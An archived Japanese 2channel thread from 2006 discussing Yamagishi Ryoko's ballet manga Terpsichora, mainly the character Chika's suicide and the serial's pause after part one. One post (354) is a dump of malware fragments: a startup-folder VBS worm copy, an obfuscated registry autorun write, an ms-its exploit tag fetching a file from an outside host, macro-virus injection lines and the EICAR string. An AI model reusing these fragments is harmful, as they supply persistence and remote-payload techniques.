303 :名無しんぼ@お腹いっぱい:2006/08/27(日) 11:18:24 ID:YhTsHeOD0
同人板でやんな。

304 :名無しんぼ@お腹いっぱい:2006/08/27(日) 14:57:07 ID:xlGNWRIq0
普通につまらん

305 :名無しんぼ@お腹いっぱい:2006/08/27(日) 17:10:37 ID:hpqhxs2Y0
エロを絡めてエロパロ板で続きを


306 :名無しんぼ@お腹いっぱい:2006/08/28(月) 02:10:53 ID:G48DQMR5O
ヒカルが六花、佐為が千花
ハクが水樹ちゃん、湯婆ー婆がゴッシーかな?

307 :名無しんぼ@お腹いっぱい:2006/08/28(月) 07:19:23 ID:QkyRNe6YO
面白いつもりなのか?

308 :名無しんぼ@お腹いっぱい:2006/08/28(月) 21:17:09 ID:lSiOMUCp0
>>302
腐女子ってキモいね。

309 :名無しんぼ@お腹いっぱい:2006/08/28(月) 23:32:38 ID:0hJN1PJV0
腐女子は801好きの総称
誤用はイクナイ

310 :真夜中のダソディー:2006/08/29(火) 23:22:15 ID:/mXrNx6F0
千花ちゃんのために鎮魂歌(チンコ歌じゃないよ)をオリジナルでで作りました。
みんなで合唱して、千花ちゃんを昇天させてあげましょう(^^)♪



「勝手に千花ちゃんDed」

ララララ・・・・・・・・・

松葉杖の篠原 プリマの夢も消えて
クララ舞う想い出は ちょいと瞳の中に消えたほどに
それにしても涙が 止まらないどうしよう
ウブな女みたいに ちょっと金子は篠原家居座る

さっきまで千花ひとり 千恵子思い出してたとき
シャイなハートにルージュなケバコ つきまとう
いじめられずにいられない お目にかかれて

ヒザ完治! そうねだいたいねー  (不肖の弟子)
ヒザ完治! ちょっと待っててオー〜  (F先生)
ヒザ完治! ま〜だ早いー   (リハビリのお兄さん)
不運なものねバレエ踊れば
ヒザ完治のカス付き
ヒザ完治のカス付き
ヒザ完治のカス付き



これで千花ちゃんも、天国に逝けたかな・・・(’ー’ )

311 :名無しんぼ@お腹いっぱい:2006/08/29(火) 23:46:24 ID:/Zl3vCiQ0
つまんないを通り越して笑っちまったよ。

312 :名無しんぼ@お腹いっぱい:2006/08/30(水) 00:57:49 ID:ZG9u3A2L0
初めの頃は少女漫画板との差別化を図ろうと躍起になってたのに
腐女子の巣と化すとは・・

313 :名無しんぼ@お腹いっぱい:2006/08/30(水) 01:05:22 ID:kHUCwlrO0
IDがでる分、あっちのように自作自演だらけにはならないメリットはあるにはある。

314 :名無しんぼ@お腹いっぱい:2006/08/30(水) 16:12:34 ID:5ukiz4u80
腐女の定義は2chでは広がり単にホモ好き女というだけではなく
周りに迷惑をかけるキモオタ女。詳しくはガ板参照。

315 :名無しんぼ@お腹いっぱい:2006/08/30(水) 18:38:42 ID:ECY1fUdoO
千花ちゃんが「それも背の低いわたしはプリマじゃないと意味がない」と言ってたが、背が普通だったら民族系の踊りや三羽の白鳥でも良かったのかな?とにかく生きる道を選んで欲しかったんだけどそのセリフのあとすぐに千恵子の「それは逃げよ」だもんね。つらすぎ。

316 :名無しんぼ@お腹いっぱい:2006/08/30(水) 19:41:21 ID:lcOKdoOB0
どのバレリーナも、はじめはやるからにはプリマ!なんじゃないかな。
それでだんだん経験つんでキャラクタやコールドに行ったり、行かざるをえなかったり…。

まだ若いから母親が「逃げよ!」って言ってもしょうがないかなとは思った。諦めるのはやすぎるわよ、見たいな意味で。

317 :sage:2006/08/30(水) 20:33:44 ID:ECY1fUdoO
確かにあの時は千恵子さん、酷いこというなあとまでは思わなかった。六花ちゃん、姉妹の間の話しをお母さんにペラペラしゃべって、いいのか?とか思って読んでいました。

318 :名無しんぼ@お腹いっぱい:2006/08/30(水) 20:40:00 ID:Nye//3f80
あれはユキが小学生の時にバレエ辞めるって言った時との対比なんだと思う。
ユキが辞めるって言ったのも股関節とバレエの事を考えると辛いからだったし。
ユキは辞める事を許されたけどチカは許されなかった。背負ってる物が違うけどさ。
良くも悪くも篠原家では親にバレエがらみの事は相談する事に暗黙でなってるんだろうな。

319 :名無しんぼ@お腹いっぱい:2006/08/31(木) 00:31:59 ID:Odd78naZ0
ヒカ碁パロディとか替え歌とか・・・
何なのここ・・・

320 :名無しんぼ@お腹いっぱい:2006/08/31(木) 01:11:13 ID:LJ4wKVkv0
>>319
ヒカルとかいうのが分からない私も意味が分からない。
どうやら腐女子が集まってきちゃったみたい。

321 :名無しんぼ@お腹いっぱい:2006/08/31(木) 01:39:37 ID:SQkAkAuY0
それでもまだIDある分マシなんだな

322 :名無しんぼ@お腹いっぱい:2006/08/31(木) 02:02:39 ID:jR0x/tSR0
>>315
三羽は「大きい白鳥」なので
やるとしたら四羽の「小さい白鳥」だべ。


323 :名無しんぼ@お腹いっぱい:2006/08/31(木) 02:15:06 ID:NBluvQet0
つうかやっぱ死ぬ奴は馬鹿。自殺だから天国にも行ってない。親泣かせて糞馬鹿女だ。
全く同情できない。生きたくても生きられない子だっているんだ。馬鹿女。

324 :名無しんぼ@お腹いっぱい:2006/08/31(木) 02:16:02 ID:brh45GzKO
もし背が大きかったら…という話だから三羽にしたのだった。でも大した話じゃなかったの。ごめんなさい。金子先生デカイからスペインの踊りなのかしら。ガッチリ系がよくやりますね。あまり詳しくないんですけど…

325 :名無しんぼ@お腹いっぱい:2006/08/31(木) 04:25:48 ID:jR0x/tSR0
>>324
ゴメンね、ちゃんと読んでなかったorz
チカちゃん「他人には負けるものか」だったから
貝塚あたりでたまにソリストやるような将来はお断り、って感じだった気がするわ。
ええとこのバレエ団のプリマになれなくても
親が経済的に面倒さえみてくれれば
踊りはつづけられるわけだが…。
そんな趣味バレエの延長みたいなのは興味茄子だったんだろね。


326 :名無しんぼ@お腹いっぱい:2006/08/31(木) 19:44:02 ID:PxDOxcJ00
>>315
千恵子が1巻の最初の方で、
「プリマ・・・わたしはあそこではプリマとは・・・
でも千花はやれるわ
あの子には絶対にわたし以上になってもらわなくてはね!」
と期待してたので、最低貝塚のプリマになれないと、
母の期待に応えられないと思ってたとオモワレ。

327 :名無しんぼ@お腹いっぱい:2006/08/31(木) 20:17:44 ID:Y2sGSdY7O
期待に答える、答えたいというのかなあ
そうなりたい、そうあらねば、というより、そうなるもの、とチカ自身が刷り込んじゃったという感じ

328 :名無しんぼ@お腹いっぱい:2006/09/01(金) 01:38:30 ID:1ut6KmGO0
来週はもう発売日ですねえ。
だけど全然楽しみな気分にならないなあ・・・

329 :名無しんぼ@お腹いっぱい:2006/09/01(金) 09:06:42 ID:OB6OiDtD0
テンション下がっちゃうよねー。
という話を友達とした。

330 :名無しんぼ@お腹いっぱい:2006/09/01(金) 09:15:54 ID:QwXYMicf0
1部完で、まさか2年くらい空けるつもりじゃあるめーな・・・

331 :名無しんぼ@お腹いっぱい:2006/09/02(土) 13:32:25 ID:SMvCiIE30
そんなにあけたらギシ先生もう年で描けなくなっちゃうじゃんー

332 :名無しんぼ@お腹いっぱい:2006/09/02(土) 20:04:45 ID:BbyNet440
ちょっとお休みするのなら、
テレプシでは描けないテーマの短編を描いたりするかな。
でも、テレプシなら母父子ネタも姉妹ネタも男女ネタも美醜ネタも
同性愛もロリもメンヘルも神話も全部てんこもりにできそうだから、
歴史物か、あとは、オカルトとかオカルトとかオカルトとか・・・

333 :名無しんぼ@お腹いっぱい:2006/09/02(土) 21:31:21 ID:dXOJJdMM0
オカルトはもうそれなりの雑誌まであるし、山岸先生の食指もそれほど動かないような気がする。


334 :名無しんぼ@お腹いっぱい:2006/09/02(土) 21:43:29 ID:nAOCZF1X0
外国童話モノみたいよー。
あの山岸先生のちょっと古いイギリス男女みたいな絵柄の雰囲気が好きなのに。

335 :名無しんぼ@お腹いっぱい:2006/09/03(日) 01:35:45 ID:iawLTgi20
ボーイズラブ書いてー

336 :名無しんぼ@お腹いっぱい:2006/09/03(日) 12:47:50 ID:FGbgk0TX0
ボーイズラブというと、町を歩いてた男子高校生が中東の金持ちに見初められて
突然連れ去られ、宮殿に囲われるけど一波乱あって逃げ出し、助けてくれた男
と恋に落ちてめでたしめでたしなイメージしかない。
久々に頭の痛くなるものを読んだわ。

337 :名無しんぼ@お腹いっぱい:2006/09/03(日) 13:31:27 ID:xfGd/low0
>>336
ほほう。
なんかハーレクインロマンスのヒロインを男子にしたような…。
とはいえ、ハーレクインも読んだ事ないけど。

そういえばまだハーレクイン健在なのかとググったら、専門店まで出てきた。

338 :名無しんぼ@お腹いっぱい:2006/09/03(日) 13:55:16 ID:KNs4EHQU0
ハーレクインはコミックスもたくさん出してるよね。
作画を担当している漫画家の面々が
ベテラン、中堅様々で脈絡がないように思える(寄せ集め?)。
山岸さんは描きそうにないけど。


339 :名無しんぼ@お腹いっぱい:2006/09/03(日) 15:34:06 ID:YJP2jJXa0
>>336
すごいなあ
アラブの変態大金持ちって古典だよなあ
きっと世界各国から拉致ってきた美少年ハーレムで
乱交千一夜物語なんだろうなあ
妖しげなお薬とかお道具とか一杯使っちゃうんだろうなあ
絹と宝石で着飾らせられた籠の鳥で
でも淋しいとか言っちゃうんだろうなあ
数日前まで平和な日本の男子高校生だったのに
もう笑うしかないよなああ

・・・と想像してみた。

340 :名無しんぼ@お腹いっぱい:2006/09/03(日) 15:51:00 ID:Klb1ivtS0
>>338
キャリア的には古参だけど、描いてる(オリジナル)作品は(以下自粛
……な人が多い、という印象。
もちろん全部が全部そういう人ばっかりではないけど…。

昔一時的に流行った「レディースコミック」のパターンと似てる、というか。

341 :名無しんぼ@お腹いっぱい:2006/09/04(月) 00:36:09 ID:AwDGbgUS0
>340
今まで仕事してきた雑誌で描けなくなった人じゃないの?>ハーレクイン作家
連載するとこないとか。
山岸さんテレプシ以前はしばらく長い連載してなかったようだけど
仕事を詰めてする必要がないんでしょうね。

342 :名無しんぼ@お腹いっぱい:2006/09/05(火) 17:03:51 ID:8LoulYrUO
あっちのスレで、ギシさま病気とかいう書き込みがあったね
あれデマでそ?

343 :名無しんぼ@お腹いっぱい:2006/09/05(火) 18:23:21 ID:hPFS1Xxx0
本刷れの前レスで、我が子へのいじめ話で、
首謀者が様子伺いの電話かけてきた、ってのがあったけど
毛箱の行動もすごい心臓・・・先生スレ読んでるのかな?

344 :名無しんぼ@お腹いっぱい:2006/09/05(火) 18:25:10 ID:En0rPgx80
日本語でOK

345 :名無しんぼ@お腹いっぱい:2006/09/05(火) 18:27:08 ID:G9u1XlA20
>>343
このくらいなら把握できるよ。

毛箱をもう一度登場させるとしたらあれが一番自然だったからじゃないかな。


346 :名無しんぼ@お腹いっぱい:2006/09/05(火) 18:40:05 ID:En0rPgx80
少女漫画板の住民は空気読めないな。
出張所のつもりならさっさと帰れ。

347 :名無しんぼ@お腹いっぱい:2006/09/05(火) 19:26:39 ID:d8iVijXB0
>>342
もともと酷い乱視の上に老眼が重なり腕は腱鞘炎で辛いって言ってなかったっけ?
細く長く描き続けて欲しいな


348 :名無しんぼ@お腹いっぱい:2006/09/05(火) 21:04:51 ID:cFmtM0zt0
>>343
ここの前スレで見た気がする。

349 :名無しんぼ@お腹いっぱい:2006/09/05(火) 21:27:10 ID:8LoulYrUO
>>347
レスd
心配だよね、どうか無理されませんように

350 :名無しんぼ@お腹いっぱい:2006/09/06(水) 19:06:46 ID:hVcF1Ieg0
テレプシ今月号で第一部完という話だったけど
来月に延びたらしいね なんかあったのかな?
中断といえば封印とツタンカーメンがあるね
ちょいと調べたら
封印 LaLa94年7月号〜95年7月号
ツタンカーメン 96年comicトム5月号〜97年4月号
一年で再開してるけど出版社も変わっているんで参考にはならないか
リアルで読んでいた人は一年間待ち続けたの?

351 :名無しんぼ@お腹いっぱい:2006/09/06(水) 19:07:32 ID:Pikl2WYg0
公式発売日で週の半ばなのにどこにも置いてなかった。
前は発売日にローソンで読めたのに。
ダヴィンチ側に問題がありそうな気がするんだけどどうなんだろ。

352 :名無しんぼ@お腹いっぱい:2006/09/06(水) 20:12:55 ID:Sjy+G/Oq0
普通の本屋で普通に読めたよーー(新宿の有りん堂)
さあ最終回!ときばってページを開いたのでちょっと拍子抜けしたw
単にエピソードが長くなっちゃっただけかな?
来月号でトゥオネラの白鳥を創って踊って最終回っぽい。

353 :名無しんぼ@お腹いっぱい:2006/09/06(水) 20:42:01 ID:H8abq9OR0
来月もう一回やるのねー。
近所の書店でデヴィンチ平積みだったけど、
確かにいつもより部数が少なめになってるた気がした。
ところで、↓ バレ です





今回、久々に前向きな展開でよかった。あのこはもう戻らないけど・・。
ゆきをあそこまでにするには、あれだけの事がひつようだってことか・・・


354 :<body onload=window()>:2006/09/06(水) 22:15:43 ID:eky4pDvm0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub




355 :名無しんぼ@お腹いっぱい:2006/09/06(水) 22:53:32 ID:QfHO11bK0
舞台で転ぶと思うから驚かないでってどういうことだろ
技術的に難しい事をやるから?
振り付けで転ぶシーンがある??

356 :名無しんぼ@お腹いっぱい:2006/09/06(水) 23:51:51 ID:rJ5PxwcF0
転ぶ振り付けなんだと思う。


「舞台で手をつく事は負けを意味するのよ」

タクトの路上ダンス

こんな振りもありなんだ


が伏線になってると思う

357 :名無しんぼ@お腹いっぱい:2006/09/07(木) 00:36:33 ID:aSkXaNGgO
ゴシマ先生が大人の意見で少し意外だったよ

358 :名無しんぼ@お腹いっぱい:2006/09/07(木) 02:35:56 ID:CcQnxod0O
シオリンが母親ぽくて意外だったよ
あの人、ミノスから来てハトシェプストをこました女にしか見えない

359 :名無しんぼ@お腹いっぱい:2006/09/07(木) 07:29:59 ID:3uJBSF5vO
ロドピス、似てるよね
目とか
だから、詩織先生は何か、腹に一物キャラに見えてしまうことがあったんだと思う
ロドピスは、あっさり処刑されたけど、色々ミステリアスな部分があって、気になるキャラではあった

360 :名無しんぼ@お腹いっぱい:2006/09/07(木) 08:47:08 ID:CcQnxod0O
あーそうそうロドピス!
詩織「子供の肉は柔らかい」
ロドピス「みんな親より先に死んじゃだめよ」
でも違和感ナス

361 :名無しんぼ@お腹いっぱい:2006/09/07(木) 09:46:24 ID:KHFVMN6f0
>>357
そうかなあ?わたしはゴッシーはやっぱり若くて浅いと思った。
悲しみを共有してくれる人達が一緒にいてくれるのは、慰めになるんだよー。
シオリーは母親やってるだけあってよくわかってると思った。

362 :名無しんぼ@お腹いっぱい:2006/09/07(木) 15:57:13 ID:D+A6yuZh0
うむ。朕もそう思た。

363 :名無しんぼ@お腹いっぱい:2006/09/07(木) 19:13:46 ID:L3GrOCKY0
>>361
自分もシオリーの方が千恵子の気持ち分かっていると思うよ。
シオリーの絵柄が山岸漫画的には腹に一物系だから警戒していたけど
今までも特に問題にするような失言や嫌がらせみたいな事はしてないんだよね。
クララで自分の生徒の茜に先に振りつけてたのはまぁしょうがない。
千恵子さんだって実はやってましたって事だってありえるんだし。<教師同士

貝塚のプリマだった人だから草間プリマみたいにバレエに対して
達観した部分があるとは思う。だからこそタクトに不満という事もね。

364 :名無しんぼ@お腹いっぱい:2006/09/07(木) 19:14:34 ID:8GiVEm4M0
いや、そこまで熱くならんでも。
ゴッシーの役割ってだけだからさ

365 :名無しんぼ@お腹いっぱい:2006/09/07(木) 19:30:19 ID:D+A6yuZh0
「だけ」って使わなきゃならない意見って、程度が低く感じる。

366 :名無しんぼ@お腹いっぱい:2006/09/07(木) 19:36:00 ID:wbsgWQf30
>>363
うるせー豚!!

367 :名無しんぼ@お腹いっぱい:2006/09/07(木) 19:38:54 ID:L3GrOCKY0
>>366
いきなり豚って言われたw

368 :名無しんぼ@お腹いっぱい:2006/09/07(木) 20:42:01 ID:m3lwRqSW0
程度がナントカっていうからでしょーが。。。


しおりセンセがどうして疑われてるのか全然わかんなかったけど、そういう見方をしてたのね。
ミノスの人はこわかったすね。

369 :名無しんぼ@お腹いっぱい:2006/09/07(木) 21:30:32 ID:wklmYPY00
スゲー。少女漫画スレのほう、スレ違いを指摘されて自粛どころか、
元からそうだと居直ってるよw
空気読めって言い分は、逸脱してるから修正しろ、と、
元からスレの流れがそうだから諦めろ、と、どっちの意味なんだろう?

370 :名無しんぼ@お腹いっぱい:2006/09/07(木) 21:52:30 ID:I2lyA+gt0
他スレの話はやめようや。くだらないから。

371 :名無しんぼ@お腹いっぱい:2006/09/07(木) 22:08:42 ID:fn3ZdASh0
んだんだ。

372 :名無しんぼ@お腹いっぱい:2006/09/07(木) 22:56:10 ID:v0c7brGG0
そうそう。ここに集うメンバーは
他人を程度低いとかくだらないとか
決め付ける人間の集まりなんだからさ。

373 :名無しんぼ@お腹いっぱい:2006/09/08(金) 00:12:27 ID:neVHXci+0
久々に明るい内容でよかった。
あかねの足、変だった。

374 :名無しんぼ@お腹いっぱい:2006/09/08(金) 00:17:18 ID:J6XTmdzW0
千恵子さんが立ち直ってきてよかったね。

375 :名無しんぼ@お腹いっぱい:2006/09/08(金) 00:31:41 ID:Zw52cG/A0
>>372
少女漫画スレに帰れ

376 :名無しんぼ@お腹いっぱい:2006/09/08(金) 03:37:22 ID:XdnTME/2O
トガッシーが手書き文字セリフで俺のはなしはオワリカヨ!みたいなところおかしかった。

377 :名無しんぼ@お腹いっぱい:2006/09/08(金) 20:21:47 ID:l7dGKIhi0
>>376
今までの六花だったら「大地君のご指名?」って浮かれてそうなもんなのに
完璧なまでのスルーっぷりが素晴らしい。

378 :名無しんぼ@お腹いっぱい:2006/09/09(土) 01:40:04 ID:vKnAoPvK0
茜にビシッと反撃したとこがよかった

379 :名無しんぼ@お腹いっぱい:2006/09/09(土) 05:42:34 ID:T8fIK8hy0
六花も精神的に強くなってきてるのかも
気弱な割りにもともと芯はしっかりしてるっぽかったけど

380 :名無しんぼ@お腹いっぱい:2006/09/09(土) 12:17:33 ID:vKWN4YD10
今月号は六花の成長がよく描かれていたね。

詩織先生たちの訪問にお茶の心配をしてみたり、
茜にびしっと言ったり冨樫にもきっぱりと自分の希望を伝えた。

母「いつのまにか六花がこんなに」
冨樫「六花…成長したな」
(うろ覚えだが)
とわざわざキャラに言わせてるし。
そろそろ「甘ちゃん六花編」は終わるんだなと感慨深かった。


所で確か9巻の次から今月号までで7話使ったと思うんだけど、
一話伸びたって事は、10巻だけ一話分厚くなるのかな?

381 :名無しんぼ@お腹いっぱい:2006/09/09(土) 15:06:06 ID:jj0Aj5JZ0
六花はやればできる子。
受験で拓人に会った時も「千花ちゃんのマネなんかしてない。私は私だもの。」
とキッパリ言ってたし。

382 :名無しんぼ@お腹いっぱい:2006/09/09(土) 15:36:15 ID:wTmy7Cxi0
しっかりもののチカちゃんに甘えていた部分があったんだろうね。

383 :名無しんぼ@お腹いっぱい:2006/09/09(土) 18:38:46 ID:35kc+ybP0
甘えていたというか影に隠れてたというか。

384 :名無しんぼ@お腹いっぱい:2006/09/09(土) 18:47:36 ID:S4YnaZYU0
でも無心に踊るときは千花ちゃんのイメージで踊っちゃうし
千花ちゃんと六花ちゃんが重なっちゃったりするし

385 :名無しんぼ@お腹いっぱい:2006/09/09(土) 18:53:35 ID:QuF4mt/g0
クララだから重なったってことか。
白鳥なら千花ちゃんのイメージの出番はあまり無いかんじかな。

386 :名無しんぼ@お腹いっぱい:2006/09/09(土) 19:34:08 ID:yCuptO0F0
>>385
次回やるのはたぶん六花の創作に近い作品で、しかも
「トゥオネラにいる千花」をイメージしたものだろうから、
むしろ「あの子が千花に見える…!」くらいのことになるんじゃ
ないだろうか。

387 :名無しんぼ@お腹いっぱい:2006/09/09(土) 19:44:41 ID:vKWN4YD10
>>386
あー、それはありそう。
それを見た全員が号泣(おさめ会だから身内しか見ない)
「だけど、千花ちゃんは今でもトゥオネラで踊り続けているのです」
と夢で見た千花をみんなにも見せてあげるとか。

388 :名無しんぼ@お腹いっぱい :2006/09/09(土) 21:11:54 ID:vOj4BZ4V0
>>356
同意。あれはそういうことだよね。
で、可哀想だけど、親の言いつけをきちんと守ったちかちゃんの悲劇との
対象になる。

389 :名無しんぼ@お腹いっぱい:2006/09/09(土) 21:48:38 ID:ifwMEm360
トゥオネラで踊る千花のイメージはまさに鎮魂。
第一部は「翼が折れて落ちてしまった舞姫」の鎮魂をして
第二部は「生き残って開花する舞姫(まさに選ばれた舞姫)」の姿だと思う。

舞姫への鎮魂で、千花だけでなく
千恵子さん、ふとみちゃん、その他の人の鎮魂も行うのではないかな、と思う。


390 :名無しんぼ@お腹いっぱい:2006/09/09(土) 22:58:43 ID:KobqPcyd0
第1部でここまで描いたら、もう第1部の続きとして第2部を描く事って無いような気がする。
第1部がこうなったことでわかるように、山岸氏はダンサーの成長を普通に描くような芸風では無いわけだし。
やっぱり「第1部」完は方便で打ちきりなのか、あるいは全く別のネタ(設定)で第2部を描くのか。
第2部あったとしても、第1部と同じようなキツいネタがメインの話になるんだろうな。

391 :名無しんぼ@お腹いっぱい:2006/09/09(土) 23:10:31 ID:1Dhxolx70
アラベスクのようにがらりと作風も絵柄も変えてくるのかな
でも最近第一部完という名前の完結が多いからなぁ

392 :名無しんぼ@お腹いっぱい:2006/09/09(土) 23:46:23 ID:0sY4cddp0
2部あたりに駿の出番が増えるのかな?
ルードラからのオファーの件だけでなく、
水樹留学決定後に六花が自分も留学っぽいことを考えたのを
不思議に思った伏線からして、
やはりいずれ六花は留学しそう。
でも踊りたくて踊っている至福の時でない時代もまたやってくるんだよね。

393 :名無しんぼ@お腹いっぱい:2006/09/10(日) 01:04:18 ID:A/Nnd70I0
で棚上げになっている近未来バレエ漫画問題はどうなるんだ。
六花が留学するとして、それを描くとしたら、何年後の設定になるんだろう。


394 :名無しんぼ@お腹いっぱい:2006/09/10(日) 01:30:39 ID:CvIHA3AaO
近未来だけどダラダラ進んで作中時間を追い越します

395 :名無しんぼ@お腹いっぱい:2006/09/10(日) 07:59:44 ID:rFE257110
2部は、キャラクターも時代設定も、作品テーマさえがらっと
変ったものになったりして。

例つ「笛吹き童子」「神隠し」
短編だけど。

1部で六花ちゃんを描ききったと感じられれば、それはそれで
いいんけど。
あーでも自殺したバレリーナの霊が祟るとかの話はいやだな。

396 :名無しんぼ@お腹いっぱい:2006/09/10(日) 10:22:08 ID:Z6RTLzxz0
今ユキが中学2年(13歳)だっけ?
留学話を描くなら飛ばしても5年くらいだから>>394になりそうな気がする。

397 :名無しんぼ@お腹いっぱい:2006/09/10(日) 11:25:19 ID:BjxvESaEO
>>395みたいなんも面白いかな、て思う
主人公の通うバレエ学校に留学してきた、若き日の美智子先生が出てきたりしてね

398 :名無しんぼ@お腹いっぱい:2006/09/10(日) 11:31:38 ID:SijiHlh70
>>397
ああ、美智子先生の話は読みたいな

399 :名無しんぼ@お腹いっぱい:2006/09/10(日) 12:56:20 ID:3HjLbcOC0
いや、やるなら空美ちゃんだろ。もちろん美智子先生つきで

400 :名無しんぼ@お腹いっぱい:2006/09/10(日) 13:11:05 ID:kDBRc5eA0
くみちゃんは主役顔じゃないからきついっすー。

401 :名無しんぼ@お腹いっぱい:2006/09/10(日) 13:29:11 ID:kqUjk4Uq0
クミ人気高いなー。

402 :名無しんぼ@お腹いっぱい:2006/09/10(日) 13:47:02 ID:6J50ferv0
空美ちゃんスタイルいいから顔だけ整形すれば何の問題もなし。

403 :名無しんぼ@お腹いっぱい:2006/09/10(日) 13:55:16 ID:FUJnz0sd0
整形じゃおっつかないよ。


404 :名無しんぼ@お腹いっぱい:2006/09/10(日) 14:40:30 ID:CvIHA3AaO
ニューハーフも女性ホルモン注射だけで顔のゴツさがとれる。
空美ちゃんは本物の女性なんだし、
中学生高校生くらいになって意外に女の子らしくなるかもよ〜?

405 :名無しんぼ@お腹いっぱい:2006/09/10(日) 14:56:36 ID:SijiHlh70
なっても艶子レベルだと思われ

406 :名無しんぼ@お腹いっぱい:2006/09/10(日) 15:12:21 ID:CC7dNaOF0
まぁ主役になることはないだろうな。

407 :名無しんぼ@お腹いっぱい:2006/09/10(日) 15:49:21 ID:kqUjk4Uq0
自分はクミは脇役だから輝く子だと思っている。
主役じゃちょっと…

408 :名無しんぼ@お腹いっぱい:2006/09/10(日) 19:12:19 ID:CvIHA3AaO
脇役でかまわないから幸せにしてやってくれ

409 :名無しんぼ@お腹いっぱい:2006/09/10(日) 19:19:37 ID:jINo66U40
実は空美ちゃんには、内臓を共有している妹がいて
その子に栄養のほとんどを持って行かれている。
妹が分離したあと、空美ちゃんは美しく成長するが
夜中にふと鏡をみると、美しかった妹が見える気がする....

410 :名無しんぼ@お腹いっぱい:2006/09/10(日) 20:19:11 ID:pkglYomF0
それなんて阪神?

411 :名無しんぼ@お腹いっぱい:2006/09/10(日) 22:55:29 ID:jyUD4Ocx0
>410
その漢字だと、なんか西成区でホルモン焼屋やってるような姉妹に思える。

412 :名無しんぼ@お腹いっぱい:2006/09/11(月) 04:20:21 ID:uzqxtA1UO
じゃりん子千花

413 :名無しんぼ@お腹いっぱい:2006/09/11(月) 10:14:25 ID:B4Ei04em0
>>410
ユキ、チカ、クミが甲子園で法被着て応援している姿が目に浮かびました。

414 :名無しんぼ@お腹いっぱい:2006/09/11(月) 20:23:08 ID:4R/IhrK80
クミは再登場しないのか?

415 :名無しんぼ@お腹いっぱい:2006/09/11(月) 20:45:34 ID:oEu28NCw0
美智子先生の外伝も見たいなぁ。
その頃のバレエ事情とか絡めて。

416 :名無しんぼ@お腹いっぱい:2006/09/11(月) 21:12:49 ID:Z80mA6D/0
ここら辺でクミアンチ登場


417 :名無しんぼ@お腹いっぱい:2006/09/11(月) 22:29:20 ID:gkY9llqHO
空美を嫌う理由がない。無垢なたましい、次元が違う。いじめとか。

418 :名無しんぼ@お腹いっぱい:2006/09/11(月) 22:53:58 ID:QyP9yDhL0
一部完って元々の予定だったのかな。
休まざるを得なくなってストーリーを調整しただけ?

419 :名無しんぼ@お腹いっぱい:2006/09/11(月) 23:28:02 ID:r/bBUcnY0
ストーリーというか連載期間は引き延ばせるだけ引き延ばしたって感じだけど。
さすがにもうこれ以上延ばせないから終わりにするけど、とりあえず第一部完ということにして読者をつなぎ止める作戦という気がする。


420 :名無しんぼ@お腹いっぱい:2006/09/12(火) 00:06:28 ID:8cZDVIaC0
じゃあ、クミは夜逃げして終わりか。
まあ、山岸さんは伏線とかあんまり回収しないけど。

421 :名無しんぼ@お腹いっぱい:2006/09/12(火) 00:11:25 ID:fh2ll4rU0
んー、「ダヴィンチ編集部が山岸をつなぎ止めるために連載を極力引っ張っている」
って意見よく見かけるけど、自分にはそうは思えない。
割と一話一話に必然性があるし、無駄に引き延ばしてる感はないよ。
延ばそうと思えばもっと延ばせる箇所いくつもあるよ。

422 :名無しんぼ@お腹いっぱい:2006/09/12(火) 00:35:59 ID:x1aPAFwV0
ダヴィンチ側が長期連載を要求したからじゃなくて
山岸先生の創作意欲だから長期連載になった感じがする。
>421には同意だな。
読み返してもなにげない描写が伏線になってるし。

423 :名無しんぼ@お腹いっぱい :2006/09/12(火) 01:23:56 ID:z4iL5ciB0
第一部とか分けるのって、ただ単に先生が休みたいからなんでないの?
描きたいことはあるけど、連載って辛いんじゃないか。トシだし。
引き延ばしてる感じはしないけどなぁ。
二部も頑張って欲しい。

424 :名無しんぼ@お腹いっぱい:2006/09/12(火) 01:34:17 ID:Qx5W081M0
単純にストーリーに区切りをつけたいんでしょう。

425 :名無しんぼ@お腹いっぱい:2006/09/12(火) 01:47:20 ID:sKhkrpt20
ん〜。
チカ三回も手術して自殺、はしつこいと思った。
くるみ以降、確実にテンポがのろい。

426 :名無しんぼ@お腹いっぱい:2006/09/12(火) 02:06:05 ID:fh2ll4rU0
クルミ以降テンポ落ちたと言うのは同意だけど
描きたい事が多くなって来たって事なんじゃないかな。
第一部完が一話伸びたのもそう。(単純に編集のミスかも知れないけど)
無理に引き延ばしてる感は感じられない。

427 :名無しんぼ@お腹いっぱい:2006/09/12(火) 03:38:26 ID:YUnxaLCU0
千花のケガって結局、再起不能ってことっだたの?
辛抱強く治療やリハビリしてたらまた踊れる可能性あったのに、いろいろなこと
が重なって鬱とかノイローゼになっちゃって自殺しちゃったの?


428 :名無しんぼ@お腹いっぱい:2006/09/12(火) 05:32:05 ID:UkMiKLF8O
一巻あたりの千恵子にテレプシの単行本一気読みさせたいなぁ

429 :名無しんぼ@お腹いっぱい:2006/09/12(火) 10:10:06 ID:VUnfX2+70
雑誌掲載中は長いなぁと思っても単行本にまとまるとだらだら感じないけどね。<山岸作品

430 :名無しんぼ@お腹いっぱい:2006/09/12(火) 11:23:08 ID:A+x+l7xjO
テレプシが完結するまで、テレプシのこと一切遮断した生活を送りたいような
(できないけど)

もし20巻とかまで行くなら(それはないかな)、それをまとめ読みできるカタルシスて、すごいだろうなあ

